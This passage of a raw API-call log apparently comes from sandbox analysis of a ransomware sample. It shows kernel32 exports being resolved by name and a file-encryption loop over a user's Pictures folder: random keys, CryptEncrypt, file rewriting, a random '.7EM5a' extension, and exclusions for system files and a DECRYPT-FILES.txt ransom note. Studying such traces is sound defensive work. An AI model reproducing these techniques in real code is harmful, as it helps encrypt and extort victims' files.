lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.658] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.658] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.658] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.658] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.658] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.658] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.658] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.658] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.658] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.658] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.658] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.658] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.658] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.658] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.658] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.659] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.659] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.659] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.659] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.659] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.659] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.659] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.659] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.659] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.659] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.659] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.659] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.659] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.659] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.659] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.659] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.659] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.659] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.660] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.660] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.660] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.660] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.660] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.660] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.660] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.660] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.660] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.660] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.660] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.660] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.660] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.660] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.660] lstrlenA (lpString="DELETEATOM") returned 10 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.660] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.660] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.660] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.661] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.661] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.661] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.661] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.661] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.661] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.661] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.661] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.661] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.661] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.661] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.661] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.661] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.661] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.661] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.661] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.661] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.662] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.662] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.662] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.662] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.662] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.662] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.662] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.662] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.662] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.662] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.662] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.662] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.662] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.662] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.662] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.662] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.662] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.662] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.663] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.663] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.663] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.663] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp") returned 63 [0086.663] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp.7EM5a") returned 69 [0086.663] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\agnk5q1b.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\AGnK5Q1b.bmp.7EM5a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\agnk5q1b.bmp.7em5a"), dwFlags=0x0) returned 1 [0086.664] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.664] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.664] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.665] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c618870, ftCreationTime.dwHighDateTime=0x1d4c8a4, ftLastAccessTime.dwLowDateTime=0x2e2812f0, ftLastAccessTime.dwHighDateTime=0x1d4ce2f, ftLastWriteTime.dwLowDateTime=0x2e2812f0, ftLastWriteTime.dwHighDateTime=0x1d4ce2f, nFileSizeHigh=0x0, nFileSizeLow=0x16b7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="CjScda.jpg", cAlternateFileName="")) returned 1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="DECRYPT-FILES.txt") returned -1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="autorun.inf") returned 1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="boot.ini") returned 1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="desktop.ini") returned -1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="ntuser.dat") returned -1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="iconcache.db") returned -1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="bootsect.bak") returned 1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="ntuser.dat.log") returned -1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="thumbs.db") returned -1 [0086.665] lstrcmpiW (lpString1="CjScda.jpg", lpString2="Bootfont.bin") returned 1 [0086.665] lstrlenW (lpString="CjScda.jpg") returned 10 [0086.665] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.665] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.665] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.665] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.665] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.665] lstrlenW (lpString="CjScda.jpg") returned 10 [0086.665] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.665] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="CjScda.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg" [0086.665] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.665] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\cjscda.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.666] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=93050) returned 1 [0086.666] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.666] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.666] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.666] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.666] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.666] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.667] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.668] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.668] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.669] CloseHandle (hObject=0x42c) returned 1 [0086.670] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.670] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.671] CloseHandle (hObject=0x0) returned 0 [0086.671] CloseHandle (hObject=0x428) returned 1 [0086.671] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.671] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.671] GetTickCount () returned 0x114e1e7 [0086.671] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.672] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.672] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.672] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.672] lstrlenA (lpString="kernel32.dll") returned 12 [0086.672] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.672] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.672] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.672] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.672] lstrcpyA (in: 